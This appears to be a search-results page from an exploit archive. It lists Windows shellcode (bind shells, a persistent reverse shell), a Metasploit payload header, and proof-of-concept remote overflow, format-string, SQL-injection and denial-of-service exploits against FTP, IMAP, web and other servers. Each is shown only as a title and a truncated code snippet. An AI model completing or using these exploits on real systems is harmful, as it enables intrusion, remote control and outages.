23 matches found
Windows x86 Pingback, Reverse TCP Inline
Connect back to attacker and report UUID Windows x86 This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 307 include Msf::Payload::Windows include Msf::Payload::Single include...
Windows/x64 - Bind Shell TCP Shellcode (508 bytes)
/ Title : Windows x64 Bind Shell TCP Shellcode size : 508 bytes Date : 08-12-2016 Author : Roziul Hasan Khan Shifat Tested On : Windows 7 Professional x64 / / section .text global start start: xor rdx,rdx mov rax,gs:rdx+0x60 mov rsi,rax+0x18 mov rsi,rsi+0x10 lodsq mov rsi,rax mov r14,rsi+0x30...
Windows x86 - Bind Shell TCP Shellcode
Windows x86 - Bind Shell TCP Shellcode. Shellcode exploit for Winx86 platform / Title : Windows x86 bind shell tcp shellcode Author : Roziul Hasan Khan Shifat Date : 08-09-2016 Tested On : Windows 7 Ultimate , Starter x86 / //Note: This shellcode will only works on x86 / section .text global star...
Windows/x86 - Persistent Reverse Shell TCP (494 Bytes)
/ Title : Windows x86 persistent reverse shell tcp Author : Roziul Hasan Khan Shifat Date : 04-09-2016 Tested on : Windows 7 x86 / / Note : This program must be run as adminstrator for 1st time . otherwise it won't be persistent / / section .text global start start: xor ecx,ecx mov eax,fs:ecx+0x3...
Crob FTP Server <= 3.6.1 - Remote Stack Overflow Exploit
No description provided by source. / CrobFTP remote stack overflow PoC --------------------------------- Tested on Crob FTP Server 3.6.1, Windows XP Coded by Leon Juranic [email protected] LSS Security / http://security.lss.hr / include stdio.h include windows.h include time.h pragma comment...
MS Windows XP/2003 - IPv6 Remote Denial of Service Exploit
No description provided by source. // // Example usage: LandIpV6 \Device\NPFB1751317-BAA0-43BB-A69B-A0351960B28D //fe80::2a1:b0ff:fe08:8bcc 135 // // Written by: Konrad Malewski. // include stdlib.h include stdio.h include Winsock2.h include ws2tcpip.h include pcap.h include remote-ext.h...
Quick easy ftp server 4.0.0 plurality of command format string vulnerability-vulnerability warning-the black bar safety net
Version: Quick easy ftp server 4.0.0 other version not test Test: W2K SP4 Quick easy ftp server 4.0.0 is not safe to use wsprintfA function for string operations, resulting in format string vulnerabilities. The affected commands include LS, CD, USER, etc. Wherein the USER command does not need to...
Cisco VPN Client 0day Integer Overflow
/ Cisco VPN Client 0day Integer overflow DOS Proof Of Concept Code By Alex Hernandez aka alt3kx c November 2009 This POC is only for test. If an application read a malformed chars file like this POC, the application will be crashed. We tested this code on: Windows Vista Bussines SP1 Spanish Windo...
Oracle Network Authentication CVE-2009-1979 Remote Buffer Overflow Vulnerability
No description provided by source. include winsock2.h include stdio.h include string.h include windows.h include assert.h include string void ssend SOCKET s, char msg, DWORD size int sent; printf "ssend: begin: %d bytes\n", size; sent=send s, charmsg, size, 0; if sent==SOCKETERROR printf "send -...
MiniShare HTTP 1.5.5 BoF
No description provided by source. / MiniShare HTTP Server 1.5.5 Remote Buffer overflow Exploit by eMP3R0r TEAM This bug Expl0ited and Discovered by iM4n Sp Tnx2 : Shabgard & Aria Security FOrum The Crimson Idol / include winsock2.h include stdio.h include string.h include stdlib.h include dos.h...
IPSwitch IMAP Server <= 9.20 Remote Buffer Overflow Exploit
Exploit for windows platform in category remote exploits =========================================================== IPSwitch IMAP Server include include include include "winsock2.h" pragma commentlib, "ws232" define usage voidfprintfstderr, "Ipsbitch vs Ipswitch IMAP \n\nExample: ipsbitch.exe ip...
CesarFTP Server Long Command Denial of Service Exploit
No description provided by source. / ----------------------------------------------------------------------- cesarftp.c - Cesar FTP Server Long Command DoS Exploit Copyright C 2000-2004 HUC All Rights Reserved. Author : lion : [email protected] : http://www.cnhonker.com Date : 2004-08-30...
Xitami Web Server 2.5c2 - LRWP Processing Format String (PoC)
/ PoC exploit for Xitami Web Server v2.5c2 LRWP processing format string bug Advisory is available at: http://www.bratax.be/advisories/b013.html multiple vulnerabilities! check it out! @author: bratax @url: http://www.bratax.be/ @email: [email protected] Thanks to BuzzDee for learning me how to us...
Apple QuickTime 7.2/7.3 RSTP Response Code Exec Exploit (Vista/XP)
No description provided by source. / ============================================================= Apple Quicktime Vista/XP RSTP Response Remote Code Exec ============================================================= Discovered by: h07 Author: InTeL Tested on:...
Invision Gallery 2.0.7 - readfile() SQL Injection
Invision Gallery 2.0.7 - readfile SQL Injection / | || || | | |/ / | || | | / - | | ' 2.0.7 ReadFile & SQL injection exploit +-------------+ | Uzage: | +-------------+ + ReadFile: - syntax: readfile 1 readfile 2 // try it if readfile1 failed ; - params: - path to local file ../file, for example:...
NaviCOPA Web Server 2.01 - GET Remote Buffer Overflow
NaviCOPA Web Server 2.01 - GET Remote Buffer Overflow / naviexp.c NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit Coded by h07 Tested on XP SP2 Polish, 2000 SP4 Polish Example: C:\naviexp 192.168.0.1 0 NaviCOPA Web Server 2.01 0day Remote Buffer Overflow Exploit Coded by h07 + Sendin...
Neon Responder 5.4 - Clock Synchronization Denial of Service
Neon Responder 5.4 - Clock Synchronization Denial of Service / Stefan Lochbihler/ include include include pragma commentlib,"ws232" define PORT 4347 char CLOCKMSG = "\x00\x0e\x5a\x00\x4c\xe9\x24\xb1\x17\x88\x40\x84"; //Password = "" void usage char; void endpgr char ,SOCKET, char; unsigned long...
[EXPL] TCP Chat(TCPX) DoS (Exploit)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...
Stream / Raped (Windows) - Denial of Service
/ Straped 1.0 author: Marco Del Percio 20/05/2005 Remember: this is a mulithreaded program! MSVC++ compile with /MT. Remember: This program requires raw socket support! You can't use it on Windows XP SP2 and if you've done MS05-019 update you'll have to re-enable raw socket support! If you still...
Microsoft Windows XP2003 - IPv6 Remote Denial of Service
Microsoft Windows XP2003 - IPv6 Remote Denial of Service // // Example usage: LandIpV6 \Device\NPFB1751317-BAA0-43BB-A69B-A0351960B28D //fe80::2a1:b0ff:fe08:8bcc 135 // // Written by: Konrad Malewski. // include include include include include include...